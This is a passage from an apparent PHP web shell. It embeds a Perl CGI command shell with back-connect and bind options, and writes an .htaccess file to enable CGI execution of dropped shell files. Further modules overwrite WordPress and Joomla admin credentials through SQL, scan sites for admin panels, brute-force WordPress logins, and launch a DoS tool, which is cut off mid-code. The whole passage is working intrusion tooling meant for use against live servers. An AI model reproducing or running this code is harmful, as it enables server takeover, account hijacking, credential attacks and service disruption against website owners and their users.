\"\")\n\t\t\t{\n\t\t\t\tif(-r \$ls)\n\t\t\t\t{\n\t\t\t\t\t\$perms=\"OK\";\n\t\t\t\t\t\$log=\"error_log_\".\$i;\n\t\t\t\t}\n\t\t\t}else\n\t\t\t{\n\t\t\t\t\$perms=\"<font style='color: red;'>Cancel<font>\";\n\t\t\t}\n\t\t}\n\t\t\$result .=<<END;\n\t\t<tr>\n\n\t\t\t<form action=\"\" method=\"post\">\n\t\t\t<td><input type=\"text\" onkeyup=\"document.getElementById('log_\$i').value='less ' + this.value;\" value=\"\$log\" size='50'/></td>\n\t\t\t<td><input class=\"submit\" type=\"submit\" value=\"Try\" /></td>\n\t\t\t<input type=\"hidden\" id=\"log_\$i\" name=\"c\" value=\"less \$log\"/>\n\t\t\t<input type=\"hidden\" name=\"a\" value=\"command\" />\n\t\t\t<input type=\"hidden\" name=\"d\" value=\"\$CurrentDir\" />\n\t\t\t</form>\n\t\t\t<td>\$perms</td>\n\n\t\t</tr>\nEND\n\t\t\$i++;\n\t}\n\t\$result .=\"</table>\";\n\treturn \$result;\n}\n#------------------------------------------------------------------------------\n# Main Program - Execution Starts Here\n#------------------------------------------------------------------------------\n&ReadParse;\n&GetCookies;\n\n\$ScriptLocation = \$ENV{'SCRIPT_NAME'};\n\$ServerName = \$ENV{'SERVER_NAME'};\n\$LoginPassword = \$in{'p'};\n\$RunCommand = \$in{'c'};\n\$TransferFile = \$in{'f'};\n\$Options = \$in{'o'};\n\$Action = \$in{'a'};\n\n\$Action = \"command\" if(\$Action eq \"\"); # no action specified, use default\n\n# get the directory in which the commands will be executed\n\$CurrentDir = &trim(\$in{'d'});\n# mac dinh xuat thong tin neu ko co lenh nao!\n\$RunCommand= \$WinNT?\"dir\":\"dir -lia\" if(\$RunCommand eq \"\");\nchop(\$CurrentDir = `\$CmdPwd`) if(\$CurrentDir eq \"\");\n\n\$LoggedIn = \$Cookies{'SAVEDPWD'} eq \$Password;\n\nif(\$Action eq \"login\" || !\$LoggedIn) \t\t# user needs/has to login\n{\n\t&PerformLogin;\n}elsif(\$Action eq \"gui\") # GUI directory\n{\n\t&PrintPageHeader;\n\tif(!\$WinNT)\n\t{\n\t\t\$chmod=int(\$in{'chmod'});\n\t\tif(!(\$chmod eq 0))\n\t\t{\n\t\t\t\$chmod=int(\$in{'chmod'});\n\t\t\t\$file=\$CurrentDir.\$PathSep.\$TransferFile;\n\t\t\tchop(\$result= `chmod \$chmod \"\$file\"`);\n\t\t\tif(&trim(\$result) eq \"\")\n\t\t\t{\n\t\t\t\tprint \"<run> Done! </run><br>\";\n\t\t\t}else\n\t\t\t{\n\t\t\t\tprint \"<run> Sorry! You dont have permissions! </run><br>\";\n\t\t\t}\n\t\t}\n\t}\n\t\$rename=\$in{'rename'};\n\tif(!\$rename eq \"\")\n\t{\n\t\tif(rename(\$TransferFile,\$rename))\n\t\t{\n\t\t\tprint \"<run> Done! </run><br>\";\n\t\t}else\n\t\t{\n\t\t\tprint \"<run> Sorry! You dont have permissions! </run><br>\";\n\t\t}\n\t}\n\t\$remove=\$in{'remove'};\n\tif(\$remove ne \"\")\n\t{\n\t\t\$rm = \$CurrentDir.\$PathSep.\$remove;\n\t\tif(-d \$rm)\n\t\t{\n\t\t\t&RmDir(\$rm);\n\t\t}else\n\t\t{\n\t\t\tif(unlink(\$rm))\n\t\t\t{\n\t\t\t\tprint \"<run> Done! </run><br>\";\n\t\t\t}else\n\t\t\t{\n\t\t\t\tprint \"<run> Sorry! You dont have permissions! </run><br>\";\n\t\t\t}\t\t\t\n\t\t}\n\t}\n\tprint &ListDir;\n\n}\nelsif(\$Action eq \"command\")\t\t\t\t \t# user wants to run a command\n{\n\t&PrintPageHeader(\"c\");\n\tprint &ExecuteCommand;\n}\nelsif(\$Action eq \"save\")\t\t\t\t \t# user wants to save a file\n{\n\t&PrintPageHeader;\n\tif(&SaveFile(\$in{'data'},\$in{'file'}))\n\t{\n\t\tprint \"<run> Done! </run><br>\";\n\t}else\n\t{\n\t\tprint \"<run> Sorry! You dont have permissions! </run><br>\";\n\t}\n\tprint &ListDir;\n}\nelsif(\$Action eq \"upload\") \t\t\t\t\t# user wants to upload a file\n{\n\t&PrintPageHeader;\n\n\tprint &UploadFile;\n}\nelsif(\$Action eq \"backbind\") \t\t\t\t# user wants to back connect or bind port\n{\n\t&PrintPageHeader(\"clientport\");\n\tprint &BackBind;\n}\nelsif(\$Action eq \"bruteforcer\") \t\t\t# user wants to brute force\n{\n\t&PrintPageHeader;\n\tprint &BruteForcer;\n}elsif(\$Action eq \"download\") \t\t\t\t# user wants to download a file\n{\n\tprint &DownloadFile;\n}elsif(\$Action eq \"checklog\") \t\t\t\t# user wants to view log file\n{\n\t&PrintPageHeader;\n\tprint &ViewLog;\n\n}elsif(\$Action eq \"domainsuser\") \t\t\t# user wants to view list user/domain\n{\n\t&PrintPageHeader;\n\tprint &ViewDomainUser;\n}elsif(\$Action eq \"logout\") \t\t\t\t# user wants to logout\n{\n\t&PerformLogout;\n}\n&PrintPageFooter;");
        fclose($file);
        chmod("cgi2012.izo", 0755);
        echo " <iframe src=cgi2012/cgi2012.izo width=96% height=76% frameborder=0></iframe>\r\n \r\n </div>";
    } elseif (isset($_GET['x']) && $_GET['x'] == 'config') {
        ?>
<form action="?y=<?php 
        echo $pwd;
        ?>&amp;x=config" method="post">

<?php 
        echo "<center/><br/><b><font color=#00ff00>+--==[ Config Shell Priv8 SCR ]==--+</font></b><br><br>";
        mkdir('config', 0755);
        chdir('config');
        $kokdosya = ".htaccess";
        $dosya_adi = ".htaccess";
        $dosya = fopen($dosya_adi, 'w') or die("Error cuyy!");
        $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI\r\n\t\t\r\nAddType application/x-httpd-cgi .cpc\r\n\r\nAddHandler cgi-script .izo\r\nAddHandler cgi-script .izo";
        fwrite($dosya, $metin);
        fclose($dosya);
        $file = fopen("config.izo", "w+");
        $write = fwrite($file, base64_decode($configshell));
        fclose($file);
        chmod("config.izo", 0755);
        echo "<iframe src=config/config.izo width=97% height=100% frameborder=0></iframe>\r\n   </div>";
    } elseif (isset($_GET['x']) && $_GET['x'] == 'wp-reset') {
        ?>
<form action="?y=<?php 
        echo $pwd;
        ?>&amp;x=wp-reset" method="post">

<?php 
        echo "<center/><br/><b><font color=#00ff00>+--==[  Wordpress Reset Password  ]==--+</font></b><br><br>";
        if (empty($_POST['pwd'])) {
            echo "<FORM method='POST'>\r\n<table class='tabnet' style='width:300px;'> <tr><th colspan='2'>Connect to mySQL server</th></tr> <tr><td>&nbsp;&nbsp;Hostname</td><td>\r\n<input style='width:220px;' class='inputz' type='text' name='localhost' value='localhost' /></td></tr> <tr><td>&nbsp;&nbsp;Database</td><td>\r\n<input style='width:220px;' class='inputz' type='text' name='database' value='wp-' /></td></tr> <tr><td>&nbsp;&nbsp;username</td><td>\r\n<input style='width:220px;' class='inputz' type='text' name='username' value='wp-' /></td></tr> <tr><td>&nbsp;&nbsp;password</td><td>\r\n<input style='width:220px;' class='inputz' type='text' name='password' value='**' /></td></tr>\r\n<tr><td>&nbsp;&nbsp;User baru</td><td>\r\n<input style='width:220px;' class='inputz' type='text' name='admin' value='admin' /></td></tr>\r\n <tr><td>&nbsp;&nbsp;Pass Baru</td><td>\r\n<input style='width:80px;' class='inputz' type='text' name='pwd' value='123456' />&nbsp;\r\n\r\n<input style='width:19%;' class='inputzbut' type='submit' value='change!' name='send' /></FORM>\r\n</td></tr> </table><br><br><br><br>\r\n";
        } else {
            $localhost = $_POST['localhost'];
            $database = $_POST['database'];
            $username = $_POST['username'];
            $password = $_POST['password'];
            $pwd = $_POST['pwd'];
            $admin = $_POST['admin'];
            @mysql_connect($localhost, $username, $password) or die(mysql_error());
            @mysql_select_db($database) or die(mysql_error());
            $hash = crypt($pwd);
            $a4s = @mysql_query("UPDATE wp_users SET user_login ='" . $admin . "' WHERE ID = 1") or die(mysql_error());
            $a4s = @mysql_query("UPDATE wp_users SET user_pass ='" . $hash . "' WHERE ID = 1") or die(mysql_error());
            $a4s = @mysql_query("UPDATE wp_users SET user_login ='" . $admin . "' WHERE ID = 2") or die(mysql_error());
            $a4s = @mysql_query("UPDATE wp_users SET user_pass ='" . $hash . "' WHERE ID = 2") or die(mysql_error());
            $a4s = @mysql_query("UPDATE wp_users SET user_login ='" . $admin . "' WHERE ID = 3") or die(mysql_error());
            $a4s = @mysql_query("UPDATE wp_users SET user_pass ='" . $hash . "' WHERE ID = 3") or die(mysql_error());
            $a4s = @mysql_query("UPDATE wp_users SET user_email ='" . $SQL . "' WHERE ID = 1") or die(mysql_error());
            if ($a4s) {
                echo "<b> Success ..!! :)) sekarang bisa login ke wp-admin</b> ";
            }
        }
        echo "\r\n   </div>";
    } elseif (isset($_GET['x']) && $_GET['x'] == 'jm-reset') {
        ?>
<form action="?y=<?php 
        echo $pwd;
        ?>&amp;x=jm-reset" method="post">

<?php 
        echo "<center/><br/><b><font color=#00ff00>+--==[  Joomla Reset Password ]==--+</font></b><br><br>";
        if (empty($_POST['pwd'])) {
            echo "<FORM method='POST'><table class='tabnet' style='width:300px;'> <tr><th colspan='2'>Connect to mySQL </th></tr> <tr><td>&nbsp;&nbsp;Host</td><td>\r\n<input style='width:270px;' class='inputz' type='text' name='localhost' value='localhost' /></td></tr> <tr><td>&nbsp;&nbsp;Database</td><td>\r\n<input style='width:270px;' class='inputz' type='text' name='database' value='database' /></td></tr> <tr><td>&nbsp;&nbsp;username</td><td>\r\n<input style='width:270px;' class='inputz' type='text' name='username' value='db_user' /></td></tr> <tr><td>&nbsp;&nbsp;password</td><td>\r\n<input style='width:270px;' class='inputz' type='password' name='password' value='**' /></td></tr>\r\n<tr><td>&nbsp;&nbsp;User baru</td><td>\r\n<input style='width:270px;' class='inputz' name='admin' value='admin' /></td></tr>\r\n <tr><td>&nbsp;&nbsp;pass baru </td><td>123456 = \r\n<input style='width:130px;' class='inputz' name='pwd' value='e10adc3949ba59abbe56e057f20f883e' />&nbsp;\r\n\r\n<input style='width:23%;' class='inputzbut' type='submit' value='change!' name='send' /></FORM>\r\n</td></tr> </table><br><br><br><br>\r\n";
        } else {
            $localhost = $_POST['localhost'];
            $database = $_POST['database'];
            $username = $_POST['username'];
            $password = $_POST['password'];
            $pwd = $_POST['pwd'];
            $admin = $_POST['admin'];
            @mysql_connect($localhost, $username, $password) or die(mysql_error());
            @mysql_select_db($database) or die(mysql_error());
            $hash = crypt($pwd);
            $SQL = @mysql_query("UPDATE jos_users SET username ='" . $admin . "' WHERE ID = 62") or die(mysql_error());
            $SQL = @mysql_query("UPDATE jos_users SET password ='" . $pwd . "' WHERE ID = 62") or die(mysql_error());
            $SQL = @mysql_query("UPDATE jos_users SET username ='" . $admin . "' WHERE ID = 63") or die(mysql_error());
            $SQL = @mysql_query("UPDATE jos_users SET password ='" . $pwd . "' WHERE ID = 63") or die(mysql_error());
            $SQL = @mysql_query("UPDATE jos_users SET username ='" . $admin . "' WHERE ID = 64") or die(mysql_error());
            $SQL = @mysql_query("UPDATE jos_users SET password ='" . $pwd . "' WHERE ID = 64") or die(mysql_error());
            $SQL = @mysql_query("UPDATE jos_users SET username ='" . $admin . "' WHERE ID = 65") or die(mysql_error());
            $SQL = @mysql_query("UPDATE jos_users SET password ='" . $pwd . "' WHERE ID = 65") or die(mysql_error());
            if ($SQL) {
                echo "<b>Success : skarang password barunya >>> - (123456)";
            }
        }
        echo "\r\n   </div>";
    } elseif (isset($_GET['x']) && $_GET['x'] == 'adfin') {
        ?>
<form action="?y=<?php 
        echo $pwd;
        ?>&amp;x=adfin" method="post">

<?php 
        set_time_limit(0);
        error_reporting(0);
        $list['front'] = "admin\r\nadm\r\nadmincp\r\nadmcp\r\ncp\r\nmodcp\r\nmoderatorcp\r\nadminare\r\nadmins\r\ncpanel\r\ncontrolpanel";
        $list['end'] = "admin1.php\r\nadmin1.html\r\nadmin2.php\r\nadmin2.html\r\nyonetim.php\r\nyonetim.html\r\nyonetici.php\r\nyonetici.html\r\nccms/\r\nccms/login.php\r\nccms/index.php\r\nmaintenance/\r\nwebmaster/\r\nadm/\r\nconfiguration/\r\nconfigure/\r\nwebsvn/\r\nadmin/\r\nadmin/account.php\r\nadmin/account.html\r\nadmin/index.php\r\nadmin/index.html\r\nadmin/login.php\r\nadmin/login.html\r\nadmin/home.php\r\nadmin/controlpanel.html\r\nadmin/controlpanel.php\r\nadmin.php\r\nadmin.html\r\nadmin/cp.php\r\nadmin/cp.html\r\ncp.php\r\ncp.html\r\nadministrator/\r\nadministrator/index.html\r\nadministrator/index.php\r\nadministrator/login.html\r\nadministrator/login.php\r\nadministrator/account.html\r\nadministrator/account.php\r\nadministrator.php\r\nadministrator.html\r\nlogin.php\r\nlogin.html\r\nmodelsearch/login.php\r\nmoderator.php\r\nmoderator.html\r\nmoderator/login.php\r\nmoderator/login.html\r\nmoderator/admin.php\r\nmoderator/admin.html\r\nmoderator/\r\naccount.php\r\naccount.html\r\ncontrolpanel/\r\ncontrolpanel.php\r\ncontrolpanel.html\r\nadmincontrol.php\r\nadmincontrol.html\r\nadminpanel.php\r\nadminpanel.html\r\nadmin1.asp\r\nadmin2.asp\r\nyonetim.asp\r\nyonetici.asp\r\nadmin/account.asp\r\nadmin/index.asp\r\nadmin/login.asp\r\nadmin/home.asp\r\nadmin/controlpanel.asp\r\nadmin.asp\r\nadmin/cp.asp\r\ncp.asp\r\nadministrator/index.asp\r\nadministrator/login.asp\r\nadministrator/account.asp\r\nadministrator.asp\r\nlogin.asp\r\nmodelsearch/login.asp\r\nmoderator.asp\r\nmoderator/login.asp\r\nmoderator/admin.asp\r\naccount.asp\r\ncontrolpanel.asp\r\nadmincontrol.asp\r\nadminpanel.asp\r\nfileadmin/\r\nfileadmin.php\r\nfileadmin.asp\r\nfileadmin.html\r\nadministration/\r\nadministration.php\r\nadministration.html\r\nsysadmin.php\r\nsysadmin.html\r\nphpmyadmin/\r\nmyadmin/\r\nsysadmin.asp\r\nsysadmin/\r\nur-admin.asp\r\nur-admin.php\r\nur-admin.html\r\nur-admin/\r\nServer.php\r\nServer.html\r\nServer.asp\r\nServer/\r\nwp-admin/\r\nadministr8.php\r\nadministr8.html\r\nadministr8/\r\nadministr8.asp\r\nwebadmin/\r\nwebadmin.php\r\nwebadmin.asp\r\nwebadmin.html\r\nadministratie/\r\nadmins/\r\nadmins.php\r\nadmins.asp\r\nadmins.html\r\nadministrivia/\r\nDatabase_Administration/\r\nWebAdmin/\r\nuseradmin/\r\nsysadmins/\r\nadmin1/\r\nsystem-administration/\r\nadministrators/\r\npgadmin/\r\ndirectadmin/\r\nstaradmin/\r\nServerAdministrator/\r\nSysAdmin/\r\nadminister/\r\nLiveUser_Admin/\r\nsys-admin/\r\ntypo3/\r\npanel/\r\ncpanel/\r\ncPanel/\r\ncpanel_file/\r\nplatz_login/\r\nrcLogin/\r\nblogindex/\r\nformslogin/\r\nautologin/\r\nsupport_login/\r\nmeta_login/\r\nmanuallogin/\r\nsimpleLogin/\r\nloginflat/\r\nutility_login/\r\nshowlogin/\r\nmemlogin/\r\nmembers/\r\nlogin-redirect/\r\nsub-login/\r\nwp-login/\r\nlogin1/\r\ndir-login/\r\nlogin_db/\r\nxlogin/\r\nsmblogin/\r\ncustomer_login/\r\nUserLogin/\r\nlogin-us/\r\nacct_login/\r\nadmin_area/\r\nbigadmin/\r\nproject-admins/\r\nphppgadmin/\r\npureadmin/\r\nsql-admin/\r\nradmind/\r\nopenvpnadmin/\r\nwizmysqladmin/\r\nvadmind/\r\nezsqliteadmin/\r\nhpwebjetadmin/\r\nnewsadmin/\r\nadminpro/\r\nLotus_Domino_Admin/\r\nbbadmin/\r\nvmailadmin/\r\nIndy_admin/\r\nccp14admin/\r\nirc-macadmin/\r\nbanneradmin/\r\nsshadmin/\r\nphpldapadmin/\r\nmacadmin/\r\nadministratoraccounts/\r\nadmin4_account/\r\nadmin4_colon/\r\nradmind-1/\r\nSuper-Admin/\r\nAdminTools/\r\ncmsadmin/\r\nSysAdmin2/\r\nglobes_admin/\r\ncadmins/\r\nphpSQLiteAdmin/\r\nnavSiteAdmin/\r\nserver_admin_small/\r\nlogo_sysadmin/\r\nserver/\r\ndatabase_administration/\r\npower_user/\r\nsystem_administration/\r\nss_vms_admin_sm/\r\nadminarea/\r\nbb-admin/\r\nadminLogin/\r\npanel-administracion/\r\ninstadmin/\r\nmemberadmin/\r\nadministratorlogin/\r\nadmin/admin.php\r\nadmin_area/admin.php\r\nadmin_area/login.php\r\nsiteadmin/login.php\r\nsiteadmin/index.php\r\nsiteadmin/login.html\r\nadmin/admin.html\r\nadmin_area/index.php\r\nbb-admin/index.php\r\nbb-admin/login.php\r\nbb-admin/admin.php\r\nadmin_area/login.html\r\nadmin_area/index.html\r\nadmincp/index.asp\r\nadmincp/login.asp\r\nadmincp/index.html\r\nwebadmin/index.html\r\nwebadmin/admin.html\r\nwebadmin/login.html\r\nadmin/admin_login.html\r\nadmin_login.html\r\npanel-administracion/login.html\r\nnsw/admin/login.php\r\nwebadmin/login.php\r\nadmin/admin_login.php\r\nadmin_login.php\r\nadmin_area/admin.html\r\npages/admin/admin-login.php\r\nadmin/admin-login.php\r\nadmin-login.php\r\nbb-admin/index.html\r\nbb-admin/login.html\r\nbb-admin/admin.html\r\nadmin/home.html\r\npages/admin/admin-login.html\r\nadmin/admin-login.html\r\nadmin-login.html\r\nadmin/adminLogin.html\r\nadminLogin.html\r\nhome.html\r\nrcjakar/admin/login.php\r\nadminarea/index.html\r\nadminarea/admin.html\r\nwebadmin/index.php\r\nwebadmin/admin.php\r\nuser.html\r\nmodelsearch/login.html\r\nadminarea/login.html\r\npanel-administracion/index.html\r\npanel-administracion/admin.html\r\nmodelsearch/index.html\r\nmodelsearch/admin.html\r\nadmincontrol/login.html\r\nadm/index.html\r\nadm.html\r\nuser.php\r\npanel-administracion/login.php\r\nwp-login.php\r\nadminLogin.php\r\nadmin/adminLogin.php\r\nhome.php\r\nadminarea/index.php\r\nadminarea/admin.php\r\nadminarea/login.php\r\npanel-administracion/index.php\r\npanel-administracion/admin.php\r\nmodelsearch/index.php\r\nmodelsearch/admin.php\r\nadmincontrol/login.php\r\nadm/admloginuser.php\r\nadmloginuser.php\r\nadmin2/login.php\r\nadmin2/index.php\r\nadm/index.php\r\nadm.php\r\naffiliate.php\r\nadm_auth.php\r\nmemberadmin.php\r\nadministratorlogin.php\r\nadmin/admin.asp\r\nadmin_area/admin.asp\r\nadmin_area/login.asp\r\nadmin_area/index.asp\r\nbb-admin/index.asp\r\nbb-admin/login.asp\r\nbb-admin/admin.asp\r\npages/admin/admin-login.asp\r\nadmin/admin-login.asp\r\nadmin-login.asp\r\nuser.asp\r\nwebadmin/index.asp\r\nwebadmin/admin.asp\r\nwebadmin/login.asp\r\nadmin/admin_login.asp\r\nadmin_login.asp\r\npanel-administracion/login.asp\r\nadminLogin.asp\r\nadmin/adminLogin.asp\r\nhome.asp\r\nadminarea/index.asp\r\nadminarea/admin.asp\r\nadminarea/login.asp\r\npanel-administracion/index.asp\r\npanel-administracion/admin.asp\r\nmodelsearch/index.asp\r\nmodelsearch/admin.asp\r\nadmincontrol/login.asp\r\nadm/admloginuser.asp\r\nadmloginuser.asp\r\nadmin2/login.asp\r\nadmin2/index.asp\r\nadm/index.asp\r\nadm.asp\r\naffiliate.asp\r\nadm_auth.asp\r\nmemberadmin.asp\r\nadministratorlogin.asp\r\nsiteadmin/login.asp\r\nsiteadmin/index.asp\r\nADMIN/\r\npaneldecontrol/\r\nlogin/\r\ncms/\r\nadmon/\r\nADMON/\r\nadministrador/\r\nADMIN/login.php\r\npanelc/\r\nADMIN/login.html";
        function template()
        {
            echo '

<script type="text/javascript">
<!--
function insertcode($text, $place, $replace)
{
    var $this = $text;
    var logbox = document.getElementById($place);
    if($replace == 0)
        document.getElementById($place).innerHTML = logbox.innerHTML+$this;
    else
        document.getElementById($place).innerHTML = $this;
//document.getElementById("helpbox").innerHTML = $this;
}
-->
</script>
<br>
<br>
<h1 class="technique-two">
       


</h1>

<div class="wrapper">
<div class="red">
<div class="tube">
<center><table class="tabnet"><th colspan="2">Admin Finder</th><tr><td>
<form action="" method="post" name="xploit_form">

<tr>
<tr>
	<b><td>URL</td>
	<td><input class="inputz" type="text" name="xploit_url" value="' . $_POST['xploit_url'] . '" style="width: 350px;" />
	</td>
</tr><tr>
	<td>404 string</td>
	<td><input class="inputz" type="text" name="xploit_404string" value="' . $_POST['xploit_404string'] . '" style="width: 350px;" />
	</td></b>
</tr><br><td>
<span style="float: center;"><input class="inputzbut" type="submit" name="xploit_submit" value=" Start Scan" align="center" />
</span></td></tr>
</form></td></tr>
<br /></table>
</div> <!-- /tube -->
</div> <!-- /red -->
<br />
<div class="green">
<div class="tube" id="rightcol">
Verificat: <span id="verified">0</span> / <span id="total">0</span><br />
<b>Found ones:<br /></b>
</div> <!-- /tube -->
</div></center><!-- /green -->
<br clear="all" /><br />
<div class="blue">
<div class="tube" id="logbox">
<br />
<br />
Admin page Finder :<br /><br />
</div> <!-- /tube -->
</div> <!-- /blue -->
</div> <!-- /wrapper -->
<br clear="all"><br>';
        }
        function show($msg, $br = 1, $stop = 0, $place = 'logbox', $replace = 0)
        {
            if ($br == 1) {
                $msg .= "<br />";
            }
            echo "<script type=\"text/javascript\">insertcode('" . $msg . "', '" . $place . "', '" . $replace . "');</script>";
            if ($stop == 1) {
                exit;
            }
            @flush();
            @ob_flush();
        }
        function check($x, $front = 0)
        {
            global $_POST, $site, $false;
            if ($front == 0) {
                $t = $site . $x;
            } else {
                $t = 'http://' . $x . '.' . $site . '/';
            }
            $headers = get_headers($t);
            if (!eregi('200', $headers[0])) {
                return 0;
            }
            $data = @file_get_contents($t);
            if ($_POST['xploit_404string'] == "") {
                if ($data == $false) {
                    return 0;
                }
            }
            if ($_POST['xploit_404string'] != "") {
                if (strpos($data, $_POST['xploit_404string'])) {
                    return 0;
                }
            }
            return 1;
        }
        // --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
        template();
        if (!isset($_POST['xploit_url'])) {
            die;
        }
        if ($_POST['xploit_url'] == '') {
            die;
        }
        $site = $_POST['xploit_url'];
        if ($site[strlen($site) - 1] != "/") {
            $site .= "/";
        }
        if ($_POST['xploit_404string'] == "") {
            $false = @file_get_contents($site . "d65897f5380a21a42db94b3927b823d56ee1099a-this_can-t_exist.html");
        }
        $list['end'] = str_replace("\r", "", $list['end']);
        $list['front'] = str_replace("\r", "", $list['front']);
        $pathes = explode("\n", $list['end']);
        $frontpathes = explode("\n", $list['front']);
        show(count($pathes) + count($frontpathes), 1, 0, 'total', 1);
        $verificate = 0;
        foreach ($pathes as $path) {
            show('Checking ' . $site . $path . ' : ', 0, 0, 'logbox', 0);
            $verificate++;
            show($verificate, 0, 0, 'verified', 1);
            if (check($path) == 0) {
                show('not found', 1, 0, 'logbox', 0);
            } else {
                show('<span style="color: #00FF00;"><strong>found</strong></span>', 1, 0, 'logbox', 0);
                show('<a href="' . $site . $path . '">' . $site . $path . '</a>', 1, 0, 'rightcol', 0);
            }
        }
        preg_match("/\\/\\/(.*?)\\//i", $site, $xx);
        $site = $xx[1];
        if (substr($site, 0, 3) == "www") {
            $site = substr($site, 4);
        }
        foreach ($frontpathes as $frontpath) {
            show('Checking http://' . $frontpath . '.' . $site . '/ : ', 0, 0, 'logbox', 0);
            $verificate++;
            show($verificate, 0, 0, 'verified', 1);
            if (check($frontpath, 1) == 0) {
                show('not found', 1, 0, 'logbox', 0);
            } else {
                show('<span style="color: #00FF00;"><strong>found</strong></span>', 1, 0, 'logbox', 0);
                show('<a href="http://' . $frontpath . '.' . $site . '/">' . $frontpath . '.' . $site . '</a>', 1, 0, 'rightcol', 0);
            }
        }
    } elseif (isset($_GET['x']) && $_GET['x'] == 'wpbrute') {
        ?>
<form action="?y=<?php 
        echo $pwd;
        ?>&amp;x=wpbrute" method="post">
<center>
<br><Br><b><font size='2' >+--=[ Wordpress Brute Force ]=--+</font><br>
<center><p>Tanks To <a href="https://www.facebook.com/anton115" target="_blank">Cah_bagus</a></p></b></center>
<form enctype="multipart/form-data" method="POST">
  <table width='624' border='0' class='tabnet' id='Box'>
  <tr><th colspan="5">Wordpress Brute Force</th></tr>
    

    <tr>
      <td >&nbsp;</td>
      <td ><p>Hosts:</p></td>
      <td ><p> Users:</p></td>
      <td ><p>Passwords:</p></td>
    </tr>
    <tr>
      <td>&nbsp;</td>
      <td ><textarea style="background:black;" name="hosts" cols="30" rows="10" ><?php 
        if ($_POST) {
            echo $_POST['hosts'];
        }
        ?></textarea></td>
      <td ><textarea style="background:black;" name="usernames" cols="30" rows="10"  ><?php 
        if ($_POST) {
            echo $_POST['usernames'];
        } else {
            echo "admin";
        }
        ?></textarea></td>
      <td ><textarea style="background:black;" name="passwords" cols="30" rows="10"  ><?php 
        if ($_POST) {
            echo $_POST['passwords'];
        } else {
            echo "admin\nadministrator\n123123\n123321\n123456\n1234567\n12345678\n123456789\n123456123456\nadmin2010\nadmin2011\npassword\nP@ssW0rd\n!@#\$%^\n!@#\$%^&*(\n(*&^%\$#@!\n111111\n222222\n333333\n444444\n555555\n666666\n777777\n888888\n999999";
        }
        ?></textarea></td>
    </tr>
<tr><td colspan="4"><input class='inputzbut' type="submit" name="submit" value="Brute Now"  />
<?php 
        if ($_POST) {
            $hosts = trim(filter($_POST['hosts']));
            $passwords = trim(filter($_POST['passwords']));
            $usernames = trim(filter($_POST['usernames']));
            if ($passwords && $usernames && $hosts) {
                $hosts_explode = explode("\n", $hosts);
                $usernames_explode = explode("\n", $usernames);
                $passwords_explode = explode("\n", $passwords);
                foreach ($hosts_explode as $host) {
                    $host = RemoveLastSlash($host);
                    $hacked = 0;
                    $host = str_replace(array("http://", "https://", "www."), "", trim($host));
                    $host = "http://" . $host;
                    $wpAdmin = $host . '/wp-admin/';
                    if (!url_exists($host . "/wp-login.php")) {
                        echo "<p>" . $host . " => <font color='red'>Error In Login Page !</font></p>";
                        ob_flush();
                        flush();
                        continue;
                    }
                    foreach ($usernames_explode as $username) {
                        foreach ($passwords_explode as $password) {
                            $ch = curl_init();
                            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                            curl_setopt($ch, CURLOPT_URL, $host . '/wp-login.php');
                            curl_setopt($ch, CURLOPT_COOKIEJAR, "coki.txt");
                            curl_setopt($ch, CURLOPT_COOKIEFILE, "coki.txt");
                            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
                            curl_setopt($ch, CURLOPT_POST, TRUE);
                            curl_setopt($ch, CURLOPT_POSTFIELDS, "log=" . $username . "&pwd=" . $password . "&wp-submit=Giri&#8207;" . "&redirect_to=" . $wpAdmin . "&testcookie=1");
                            $login = curl_exec($ch);
                            if (eregi("profile.php", $login)) {
                                $hacked = 1;
                                echo "<p>" . $host . " => UserName : [<font color='green'>" . $username . "</font>] : Password : [<font color='green'>" . $password . "</font>]</p>";
                                ob_flush();
                                flush();
                                break;
                            }
                        }
                        if ($hacked == 1) {
                            break;
                        }
                    }
                    if ($hacked == 0) {
                        echo "<p>" . $host . " => <font color='red'>Failed !</font></p>";
                        ob_flush();
                        flush();
                    }
                }
            } else {
                echo "<p><font color='red'>All fields are Required ! </font></p>";
            }
        }
        ?>
</td></tr>
</table></form></center>
<?php 
        function url_exists($strURL)
        {
            $resURL = curl_init();
            curl_setopt($resURL, CURLOPT_URL, $strURL);
            curl_setopt($resURL, CURLOPT_BINARYTRANSFER, 1);
            curl_setopt($resURL, CURLOPT_HEADERFUNCTION, 'curlHeaderCallback');
            curl_setopt($resURL, CURLOPT_FAILONERROR, 1);
            curl_exec($resURL);
            $intReturnCode = curl_getinfo($resURL, CURLINFO_HTTP_CODE);
            curl_close($resURL);
            if ($intReturnCode != 200) {
                return false;
            } else {
                return true;
            }
        }
        function filter($string)
        {
            if (get_magic_quotes_gpc() != 0) {
                return stripslashes($string);
            } else {
                return $string;
            }
        }
        function RemoveLastSlash($host)
        {
            if (strrpos($host, '/', -1) == strlen($host) - 1) {
                return substr($host, 0, strrpos($host, '/', -1));
            } else {
                return $host;
            }
        }
        echo "</p>";
    } elseif (isset($_GET['x']) && $_GET['x'] == 'dos') {
        ?>
<form action="?y=<?php 
        echo $pwd;
        ?>&amp;x=dos" method="post">
<center><br><br><br>
Your IP: <font color="red"><b><?php 
        echo $my_ip;
        ?></b></font>&nbsp;(Don't DoS yourself nub)<br><br>
<table class="tabnet" style="width:333px;padding:0 1px;">
<th colspan="5">Ddos Tool</th>
<tr><tr><td>IP Target</td><td>:</td>
<td><input type="text" class="inputz" name="ip" size="48" maxlength="25"  value = "0.0.0.0" onblur = "if ( this.value=='' ) this.value = '0.0.0.0';" onfocus = " if ( this.value == '0.0.0.0' ) this.value = '';"/>
</td></tr>
<tr><td>Time</td><td>:</td>
<td><input type="text" class="inputz" name="time" size="48" maxlength="25"  value = "time (in seconds)" onblur = "if ( this.value=='' ) this.value = 'time (in seconds)';" onfocus = " if ( this.value == 'time (in seconds)' ) this.value = '';"/>
</td></tr>

<tr><td>Port</td><td>:</td>
<td><input type="text" class="inputz" name="port" size="48" maxlength="5"  value = "port" onblur = "if ( this.value=='' ) this.value = 'port';" onfocus = " if ( this.value == 'port' ) this.value = '';"/>
</td></tr></tr></table></b><br>
<input type="submit" class="inputzbut" name="fire" value="  Firee !!!   ">
<br><br>
<center>
After initiating the DoS attack, please wait while the browser loads.
</center>

</form>
</center>
<?php 
        $submit = $_POST['fire'];
        if (isset($submit)) {
            $packets = 0;
            $ip = $_POST['ip'];
            $rand = $_POST['port'];
            set_time_limit(0);
            ignore_user_abort(FALSE);
